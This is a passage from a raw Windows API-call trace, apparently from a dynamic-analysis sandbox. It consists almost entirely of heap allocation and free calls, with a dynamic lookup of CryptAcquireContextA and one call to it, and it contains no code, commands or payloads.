hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.496] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.496] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.497] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.497] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0199.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.503] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0199.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0199.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0199.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.506] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0199.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.508] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6260) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.512] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.512] HeapFree 